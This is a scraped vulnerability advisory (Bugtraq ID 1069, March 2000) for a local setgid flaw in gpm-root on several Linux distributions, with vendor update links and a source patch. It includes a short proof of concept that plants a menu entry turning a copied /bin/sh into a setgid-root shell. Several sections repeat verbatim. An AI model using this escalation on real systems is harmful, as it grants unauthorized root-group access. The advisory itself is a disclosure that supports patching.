Multiple Linux Vendor gpm Setgid Vulnerability
BID:1069
Info
Multiple Linux Vendor gpm Setgid Vulnerability
| Bugtraq ID: | 1069 |
| Class: | Design Error |
| CVE: | |
| Remote: | No |
| Local: | Yes |
| Published: | Mar 22 2000 12:00AM |
| Updated: | Mar 22 2000 12:00AM |
| Credit: | This vulnerability was posted to the Bugtraq mailing list on March 22, 2000 by Egmont Koblinger <[email protected]> |
| Vulnerable: |
SuSE Linux 6.3 SuSE Linux 6.2 SuSE Linux 6.1 SuSE Linux 6.0 SuSE Linux 5.3 Redhat Linux 6.2 i386 Redhat Linux 6.1 i386 Redhat Linux 6.0 Debian Linux 2.2 pre potato Debian Linux 2.2 Debian Linux 2.1 Debian Linux 2.0 Alessandro Rubini gpm 1.19 Alessandro Rubini gpm 1.18.1 |
| Not Vulnerable: | |
Discussion
Multiple Linux Vendor gpm Setgid Vulnerability
A vulnerability exists in the gpm-root program, part of the gpm package. This package is used to enable mice on the consoles of many popular Linux distributions. The problem is a design error, caused when a programmer chose to attempt to revert to the running users groups, after having called setuid to the users id already. The setgid call fails, and the process maintains the groups the gpm-root program is running as. This is usually the 'root' group.
This vulnerability requires the user have console access.
A vulnerability exists in the gpm-root program, part of the gpm package. This package is used to enable mice on the consoles of many popular Linux distributions. The problem is a design error, caused when a programmer chose to attempt to revert to the running users groups, after having called setuid to the users id already. The setgid call fails, and the process maintains the groups the gpm-root program is running as. This is usually the 'root' group.
This vulnerability requires the user have console access.
Exploit / POC
Multiple Linux Vendor gpm Setgid Vulnerability
cp /bin/sh /tmp
create a .gpm-root file in ~ with the following:
button 1 {
name "create a setgid shell"
"setgid shell" f.bgcmd "chgrp root /tmp/sh; chmod 2755 /tmp/sh"
}
click control-left mouse button, and click "setgid shell"
execute /tmp/sh
cp /bin/sh /tmp
create a .gpm-root file in ~ with the following:
button 1 {
name "create a setgid shell"
"setgid shell" f.bgcmd "chgrp root /tmp/sh; chmod 2755 /tmp/sh"
}
click control-left mouse button, and click "setgid shell"
execute /tmp/sh
Solution / Fix
Multiple Linux Vendor gpm Setgid Vulnerability
Solution:
A fix has been released for SuSE Linux. It is available at:
6.1:
ftp://ftp.suse.com/pub/suse/i386/update/6.1/ap1/gpm.rpm
6.2:
ftp://ftp.suse.com/pub/suse/i386/update/6.2/ap1/gpm.rpm
6.3:
ftp://ftp.suse.com/pub/suse/i386/update/6.3/ap1/gpm.rpm
The author has indicated a fix will be present in versions 1.19.1, which will be the final release by the author.
A temporary solution is to disable gpm-root.
A patch to fix the problem in gpm-1.19.0 was made available:
diff -u -r -N ../gpm-1.19.0.orig/doc/doc.gpm ./doc/doc.gpm
--- ../gpm-1.19.0.orig/doc/doc.gpm Mon Feb 7 23:34:00 2000
+++ ./doc/doc.gpm Thu Mar 23 14:37:43 2000
@@ -1969,6 +1969,12 @@
be broken by this daemon. Things should be sufficiently secure, but
if you find a hole please tell me about it.
+@item -r
+ Always run commands as root instead of the user who owns the tty.
+ Implies -u. This is useful for those system administrators who
+ put menu entries to reboot or halt the system, start or stop
+ xdm, change keyboard layout etc.
+
@item -D
Do not automatically enter background operation when started,
and log messages to the standard error stream, not the syslog
diff -u -r -N ../gpm-1.19.0.orig/gpm-root.y ./gpm-root.y
--- ../gpm-1.19.0.orig/gpm-root.y Thu Oct 7 20:15:18 1999
+++ ./gpm-root.y Thu Mar 23 14:37:43 2000
@@ -41,6 +41,7 @@
#include <sys/syslog.h>
#include <signal.h> /* sigaction() */
#include <pwd.h> /* pwd entries */
+#include <grp.h> /* initgroups() */
#include <sys/kd.h> /* KDGETMODE */
#include <sys/stat.h> /* fstat() */
#include <sys/utsname.h> /* uname() */
@@ -117,6 +118,7 @@
int opt_mod = 4; /* control */
int opt_buf = 0; /* ask the kernel about it */
int opt_user = 1; /* allow user cfg files */
+int opt_root = 0; /* run everything as root */
@@ -447,6 +449,7 @@
void f__fix(struct passwd *pass)
{
setgid(pass->pw_gid);
+ initgroups(pass->pw_name, pass->pw_gid);
setuid(pass->pw_uid);
setenv("HOME", pass->pw_dir, 1);
setenv("LOGNAME", pass->pw_name,1);
@@ -539,7 +542,7 @@
return 1;
case 0:
- setuid(uid);
+ if (opt_root) uid=0;
pass=getpwuid(uid);
if (!pass) exit(1);
f__fix(pass);
@@ -926,6 +929,7 @@
printf(" Valid options are\n"
" -m <number-or-name> modifier to use\n"
" -u inhibit user configuration files\n"
+ " -r run commands as root\n"
" -D don't auto-background and run as daemon\n"
" -V <verbosity-delta> increase amount of logged messages\n"
);
@@ -971,12 +975,13 @@
int opt;
gpm_log_daemon = 1;
- while ((opt = getopt(argc, argv,"m:uDV::")) != -1)
+ while ((opt = getopt(argc, argv,"m:urDV::")) != -1)
{
switch (opt)
{
case 'm': opt_mod=getmask(optarg, tableMod); break;
case 'u': opt_user=0; break;
+ case 'r': opt_root=1; opt_user=0; break;
case 'D': gpm_log_daemon = 0; break;
case 'V':
gpm_debug_level += (0 == optarg ? 1 : strtol(optarg, 0, 0));
A fix has been made available in gpm-1.19.2.
-------------------------------------------------------------
Turbo Linux users can use the following fix:
Update the packages from our ftp server by running the following command for each package:
rpm -Fvh ftp_path_to_filename
Where ftp_path_to_filename is the following:
ftp://ftp.turbolinux.com/pub/updates/6.0/security/gpm-1.19.2-5.i386.rpm
ftp://ftp.turbolinux.com/pub/updates/6.0/security/gpm-devel-1.19.2-5.i386.rpm
Alessandro Rubini gpm 1.18.1
Alessandro Rubini gpm 1.19
SuSE Linux 5.3
SuSE Linux 6.1
SuSE Linux 6.2
SuSE Linux 6.3
Solution:
A fix has been released for SuSE Linux. It is available at:
6.1:
ftp://ftp.suse.com/pub/suse/i386/update/6.1/ap1/gpm.rpm
6.2:
ftp://ftp.suse.com/pub/suse/i386/update/6.2/ap1/gpm.rpm
6.3:
ftp://ftp.suse.com/pub/suse/i386/update/6.3/ap1/gpm.rpm
The author has indicated a fix will be present in versions 1.19.1, which will be the final release by the author.
A temporary solution is to disable gpm-root.
A patch to fix the problem in gpm-1.19.0 was made available:
diff -u -r -N ../gpm-1.19.0.orig/doc/doc.gpm ./doc/doc.gpm
--- ../gpm-1.19.0.orig/doc/doc.gpm Mon Feb 7 23:34:00 2000
+++ ./doc/doc.gpm Thu Mar 23 14:37:43 2000
@@ -1969,6 +1969,12 @@
be broken by this daemon. Things should be sufficiently secure, but
if you find a hole please tell me about it.
+@item -r
+ Always run commands as root instead of the user who owns the tty.
+ Implies -u. This is useful for those system administrators who
+ put menu entries to reboot or halt the system, start or stop
+ xdm, change keyboard layout etc.
+
@item -D
Do not automatically enter background operation when started,
and log messages to the standard error stream, not the syslog
diff -u -r -N ../gpm-1.19.0.orig/gpm-root.y ./gpm-root.y
--- ../gpm-1.19.0.orig/gpm-root.y Thu Oct 7 20:15:18 1999
+++ ./gpm-root.y Thu Mar 23 14:37:43 2000
@@ -41,6 +41,7 @@
#include <sys/syslog.h>
#include <signal.h> /* sigaction() */
#include <pwd.h> /* pwd entries */
+#include <grp.h> /* initgroups() */
#include <sys/kd.h> /* KDGETMODE */
#include <sys/stat.h> /* fstat() */
#include <sys/utsname.h> /* uname() */
@@ -117,6 +118,7 @@
int opt_mod = 4; /* control */
int opt_buf = 0; /* ask the kernel about it */
int opt_user = 1; /* allow user cfg files */
+int opt_root = 0; /* run everything as root */
@@ -447,6 +449,7 @@
void f__fix(struct passwd *pass)
{
setgid(pass->pw_gid);
+ initgroups(pass->pw_name, pass->pw_gid);
setuid(pass->pw_uid);
setenv("HOME", pass->pw_dir, 1);
setenv("LOGNAME", pass->pw_name,1);
@@ -539,7 +542,7 @@
return 1;
case 0:
- setuid(uid);
+ if (opt_root) uid=0;
pass=getpwuid(uid);
if (!pass) exit(1);
f__fix(pass);
@@ -926,6 +929,7 @@
printf(" Valid options are\n"
" -m <number-or-name> modifier to use\n"
" -u inhibit user configuration files\n"
+ " -r run commands as root\n"
" -D don't auto-background and run as daemon\n"
" -V <verbosity-delta> increase amount of logged messages\n"
);
@@ -971,12 +975,13 @@
int opt;
gpm_log_daemon = 1;
- while ((opt = getopt(argc, argv,"m:uDV::")) != -1)
+ while ((opt = getopt(argc, argv,"m:urDV::")) != -1)
{
switch (opt)
{
case 'm': opt_mod=getmask(optarg, tableMod); break;
case 'u': opt_user=0; break;
+ case 'r': opt_root=1; opt_user=0; break;
case 'D': gpm_log_daemon = 0; break;
case 'V':
gpm_debug_level += (0 == optarg ? 1 : strtol(optarg, 0, 0));
A fix has been made available in gpm-1.19.2.
-------------------------------------------------------------
Turbo Linux users can use the following fix:
Update the packages from our ftp server by running the following command for each package:
rpm -Fvh ftp_path_to_filename
Where ftp_path_to_filename is the following:
ftp://ftp.turbolinux.com/pub/updates/6.0/security/gpm-1.19.2-5.i386.rpm
ftp://ftp.turbolinux.com/pub/updates/6.0/security/gpm-devel-1.19.2-5.i386.rpm
Alessandro Rubini gpm 1.18.1
-
Allesandro Rubini gpm-1.19.2
ftp://animal.unipv.it/pub/gpm/
Alessandro Rubini gpm 1.19
-
Allesandro Rubini gpm-1.19.2
ftp://animal.unipv.it/pub/gpm/
SuSE Linux 5.3
-
S.u.S.E. 5.3 gpm.rpm
ftp://ftp.suse.com/pub/suse_update/5.3/ap1/gpm.rpm
SuSE Linux 6.1
-
S.u.S.E. 6.1 gpm.rpm
ftp://ftp.suse.com/pub/suse/i386/update/6.1/ap1/gpm.rpm
SuSE Linux 6.2
-
S.u.S.E. 6.2 gpm.rpm
ftp://ftp.suse.com/pub/suse/i386/update/6.2/ap1/gpm.rpm
SuSE Linux 6.3
-
S.u.S.E. 6.3 gpm.rpm
ftp://ftp.suse.com/pub/suse/i386/update/6.3/ap1/gpm.rpm
References
Multiple Linux Vendor gpm Setgid Vulnerability
References:
References: